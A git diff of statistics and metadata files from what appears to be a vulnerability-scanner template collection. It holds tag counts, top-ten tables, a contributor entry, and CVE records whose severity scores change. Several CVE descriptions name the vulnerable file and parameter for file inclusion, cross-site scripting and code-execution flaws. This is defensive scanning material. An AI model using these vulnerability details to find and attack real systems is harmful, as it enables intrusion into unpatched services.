1 | | | | | | | | | +| rakefile | 1 | | | | | | | | | +| riseup | 1 | | | | | | | | | +| bottle | 1 | | | | | | | | | +| uwumarket | 1 | | | | | | | | | +| silenttrinity | 1 | | | | | | | | | +| tracing | 1 | | | | | | | | | +| bookcrossing | 1 | | | | | | | | | +| homeautomation | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| cve1028 | 1 | | | | | | | | | +| mailer | 1 | | | | | | | | | +| ptr | 1 | | | | | | | | | +| aurall | 1 | | | | | | | | | +| muhttpd | 1 | | | | | | | | | +| simply-schedule-appointments | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| trackmanialadder | 1 | | | | | | | | | +| blackbox | 1 | | | | | | | | | +| zomato | 1 | | | | | | | | | +| learning-management-system | 1 | | | | | | | | | +| scoutwiki | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| patheon | 1 | | | | | | | | | +| tapitag | 1 | | | | | | | | | +| wpcentral | 1 | | | | | | | | | +| media | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| evilginx2 | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| ebay | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| exolis | 1 | | | | | | | | | +| chromium | 1 | | | | | | | | | +| theguardian | 1 | | | | | | | | | +| myspace | 1 | | | | | | | | | +| yelp | 1 | | | | | | | | | +| bodybuildingcom | 1 | | | | | | | | | +| scrapestack | 1 | | | | | | | | | +| darktrace | 1 | | | | | | | | | +| sumo | 1 | | | | | | | | | +| deimosc2 | 1 | | | | | | | | | +| teltonika | 1 | | | | | | | | | +| showcase | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| jejapl | 1 | | | | | | | | | +| queer | 1 | | | | | | | | | +| pricing-deals-for-woocommerce | 1 | | | | | | | | | +| select-all-categories | 1 | | | | | | | | | +| dir-615 | 1 | | | | | | | | | +| 360 | 1 | | | | | | | | | +| dericam | 1 | | | | | | | | | +| go-ibax | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| twilio | 1 | | | | | | | | | +| getresponse | 1 | | | | | | | | | +| kongregate | 1 | | | | | | | | | +| bangresto | 1 | | | | | | | | | +| mofi | 1 | | | | | | | | | +| jsapi | 1 | | | | | | | | | +| cytoid | 1 | | | | | | | | | +| filr | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| svg | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| aceadmin | 1 | | | | | | | | | +| v2x | 1 | | | | | | | | | +| social-msdn | 1 | | | | | | | | | +| basicrat | 1 | | | | | | | | | +| groupware | 1 | | | | | | | | | +| prismaweb | 1 | | | | | | | | | +| uptime | 1 | | | | | | | | | +| websitepanel | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| looker | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 5234375429..32b75461bd 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | -| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | -| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | -| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | -| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | -| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | -| osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | | -| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| cve | 2239 | dhiyaneshdk | 1088 | http | 6768 | info | 3275 | file | 310 | +| panel | 1018 | dwisiswant0 | 798 | file | 310 | medium | 1413 | dns | 17 | +| wordpress | 923 | daffainfo | 787 | workflows | 191 | high | 1412 | | | +| xss | 837 | pikpikcu | 353 | network | 119 | critical | 888 | | | +| exposure | 820 | pussycat0x | 298 | ssl | 27 | low | 234 | | | +| wp-plugin | 807 | pdteam | 283 | dns | 17 | unknown | 31 | | | +| osint | 675 | ritikchaddha | 275 | headless | 10 | | | | | +| tech | 637 | ricardomaia | 226 | javascript | 2 | | | | | +| lfi | 614 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | diff --git a/contributors.json b/contributors.json index d63b99eb8c..434b9e4c4d 100644 --- a/contributors.json +++ b/contributors.json @@ -1380,6 +1380,15 @@ } }, { + "author": "noraj", + "links": { + "github": "https://github.com/noraj", + "twitter": "https://twitter.com/noraj_rawsec", + "linkedin": "", + "website": "https://pwn.by/noraj", + "email": "" + } + },{ "author": "mabdullah22", "links": { "github": "https://www.github.com/maabdullah22", @@ -1389,5 +1398,4 @@ "email": "" } } - -] +] \ No newline at end of file diff --git a/cves.json b/cves.json index 259a07c22c..37b275bed9 100644 --- a/cves.json +++ b/cves.json @@ -1,117 +1,117 @@ -{"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"} -{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration - Authentication Bypass","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"} -{"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"} +{"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"medium","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"} +{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration - Authentication Bypass","Severity":"critical","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"} +{"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"high","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"} {"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2004/CVE-2004-0519.yaml"} {"ID":"CVE-2004-1965","Info":{"Name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2004/CVE-2004-1965.yaml"} -{"ID":"CVE-2005-2428","Info":{"Name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","Severity":"medium","Description":"Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2005/CVE-2005-2428.yaml"} +{"ID":"CVE-2005-2428","Info":{"Name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","Severity":"medium","Description":"Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2005/CVE-2005-2428.yaml"} {"ID":"CVE-2005-3344","Info":{"Name":"Horde Groupware Unauthenticated Admin Access","Severity":"critical","Description":"Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2005/CVE-2005-3344.yaml"} -{"ID":"CVE-2005-3634","Info":{"Name":"SAP Web Application Server 6.x/7.0 - Open Redirect","Severity":"medium","Description":"frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2005/CVE-2005-3634.yaml"} +{"ID":"CVE-2005-3634","Info":{"Name":"SAP Web Application Server 6.x/7.0 - Open Redirect","Severity":"medium","Description":"frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2005/CVE-2005-3634.yaml"} {"ID":"CVE-2005-4385","Info":{"Name":"Cofax \u003c=2.0RC3 - Cross-Site Scripting","Severity":"medium","Description":"Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2005/CVE-2005-4385.yaml"} {"ID":"CVE-2006-1681","Info":{"Name":"Cherokee HTTPD \u003c=0.5 - Cross-Site Scripting","Severity":"medium","Description":"Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2006/CVE-2006-1681.yaml"} -{"ID":"CVE-2006-2842","Info":{"Name":"Squirrelmail \u003c=1.4.6 - Local File Inclusion","Severity":"high","Description":"SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2006/CVE-2006-2842.yaml"} +{"ID":"CVE-2006-2842","Info":{"Name":"Squirrelmail \u003c=1.4.6 - Local File Inclusion","Severity":"high","Description":"SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2006/CVE-2006-2842.yaml"} {"ID":"CVE-2007-0885","Info":{"Name":"Jira Rainbow.Zen - Cross-Site Scripting","Severity":"medium","Description":"Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2007/CVE-2007-0885.yaml"} -{"ID":"CVE-2007-4504","Info":{"Name":"Joomla! RSfiles \u003c=1.0.2 - Local File Inclusion","Severity":"high","Description":"Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2007/CVE-2007-4504.yaml"} -{"ID":"CVE-2007-4556","Info":{"Name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","Severity":"critical","Description":"Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for\"m input beginning with a \"%{\" sequence and ending with a \"}\" character.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2007/CVE-2007-4556.yaml"} +{"ID":"CVE-2007-4504","Info":{"Name":"Joomla! RSfiles \u003c=1.0.2 - Local File Inclusion","Severity":"medium","Description":"Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2007/CVE-2007-4504.yaml"} +{"ID":"CVE-2007-4556","Info":{"Name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","Severity":"medium","Description":"Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for\"m input beginning with a \"%{\" sequence and ending with a \"}\" character.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2007/CVE-2007-4556.yaml"} {"ID":"CVE-2007-5728","Info":{"Name":"phpPgAdmin \u003c=4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2007/CVE-2007-5728.yaml"} -{"ID":"CVE-2008-1059","Info":{"Name":"WordPress Sniplets 1.1.2 - Local File Inclusion","Severity":"high","Description":"PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-1059.yaml"} -{"ID":"CVE-2008-1061","Info":{"Name":"WordPress Sniplets \u003c=1.2.2 - Cross-Site Scripting","Severity":"high","Description":"WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-1061.yaml"} +{"ID":"CVE-2008-1059","Info":{"Name":"WordPress Sniplets 1.1.2 - Local File Inclusion","Severity":"high","Description":"PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2008/CVE-2008-1059.yaml"} +{"ID":"CVE-2008-1061","Info":{"Name":"WordPress Sniplets \u003c=1.2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-1061.yaml"} {"ID":"CVE-2008-1547","Info":{"Name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","Severity":"medium","Description":"Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-1547.yaml"} {"ID":"CVE-2008-2398","Info":{"Name":"AppServ Open Project \u003c=2.5.10 - Cross-Site Scripting","Severity":"medium","Description":"AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-2398.yaml"} -{"ID":"CVE-2008-2650","Info":{"Name":"CMSimple 3.1 - Local File Inclusion","Severity":"high","Description":"CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-2650.yaml"} -{"ID":"CVE-2008-4668","Info":{"Name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","Severity":"high","Description":"Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2008/CVE-2008-4668.yaml"} -{"ID":"CVE-2008-4764","Info":{"Name":"Joomla! \u003c=2.0.0 RC2 - Local File Inclusion","Severity":"high","Description":"Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-4764.yaml"} +{"ID":"CVE-2008-2650","Info":{"Name":"CMSimple 3.1 - Local File Inclusion","Severity":"medium","Description":"CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2008/CVE-2008-2650.yaml"} +{"ID":"CVE-2008-4668","Info":{"Name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","Severity":"critical","Description":"Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2008/CVE-2008-4668.yaml"} +{"ID":"CVE-2008-4764","Info":{"Name":"Joomla! \u003c=2.0.0 RC2 - Local File Inclusion","Severity":"medium","Description":"Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-4764.yaml"} {"ID":"CVE-2008-5587","Info":{"Name":"phpPgAdmin \u003c=4.2.1 - Local File Inclusion","Severity":"medium","Description":"phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-5587.yaml"} -{"ID":"CVE-2008-6080","Info":{"Name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","Severity":"high","Description":"Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6080.yaml"} -{"ID":"CVE-2008-6172","Info":{"Name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2008/CVE-2008-6172.yaml"} -{"ID":"CVE-2008-6222","Info":{"Name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","Severity":"high","Description":"Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6222.yaml"} -{"ID":"CVE-2008-6465","Info":{"Name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2008/CVE-2008-6465.yaml"} -{"ID":"CVE-2008-6668","Info":{"Name":"nweb2fax \u003c=0.2.7 - Local File Inclusion","Severity":"high","Description":"nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6668.yaml"} -{"ID":"CVE-2008-6982","Info":{"Name":"Devalcms 1.4a - Cross-Site Scripting","Severity":"high","Description":"Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-6982.yaml"} +{"ID":"CVE-2008-6080","Info":{"Name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","Severity":"medium","Description":"Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-6080.yaml"} +{"ID":"CVE-2008-6172","Info":{"Name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2008/CVE-2008-6172.yaml"} +{"ID":"CVE-2008-6222","Info":{"Name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","Severity":"medium","Description":"Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-6222.yaml"} +{"ID":"CVE-2008-6465","Info":{"Name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-6465.yaml"} +{"ID":"CVE-2008-6668","Info":{"Name":"nweb2fax \u003c=0.2.7 - Local File Inclusion","Severity":"medium","Description":"nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-6668.yaml"} +{"ID":"CVE-2008-6982","Info":{"Name":"Devalcms 1.4a - Cross-Site Scripting","Severity":"medium","Description":"Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-6982.yaml"} {"ID":"CVE-2008-7269","Info":{"Name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2008/CVE-2008-7269.yaml"} {"ID":"CVE-2009-0347","Info":{"Name":"Autonomy Ultraseek - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2009/CVE-2009-0347.yaml"} {"ID":"CVE-2009-0545","Info":{"Name":"ZeroShell \u003c= 1.0beta11 Remote Code Execution","Severity":"critical","Description":"ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2009/CVE-2009-0545.yaml"} -{"ID":"CVE-2009-0932","Info":{"Name":"Horde/Horde Groupware - Local File Inclusion","Severity":"high","Description":"Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-0932.yaml"} -{"ID":"CVE-2009-1151","Info":{"Name":"PhpMyAdmin Scripts - Remote Code Execution","Severity":"critical","Description":"PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2009/CVE-2009-1151.yaml"} -{"ID":"CVE-2009-1496","Info":{"Name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","Severity":"high","Description":"Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-1496.yaml"} -{"ID":"CVE-2009-1558","Info":{"Name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","Severity":"high","Description":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-1558.yaml"} +{"ID":"CVE-2009-0932","Info":{"Name":"Horde/Horde Groupware - Local File Inclusion","Severity":"medium","Description":"Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2009/CVE-2009-0932.yaml"} +{"ID":"CVE-2009-1151","Info":{"Name":"PhpMyAdmin Scripts - Remote Code Execution","Severity":"high","Description":"PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-1151.yaml"} +{"ID":"CVE-2009-1496","Info":{"Name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","Severity":"medium","Description":"Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2009/CVE-2009-1496.yaml"} +{"ID":"CVE-2009-1558","Info":{"Name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","Severity":"high","Description":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to 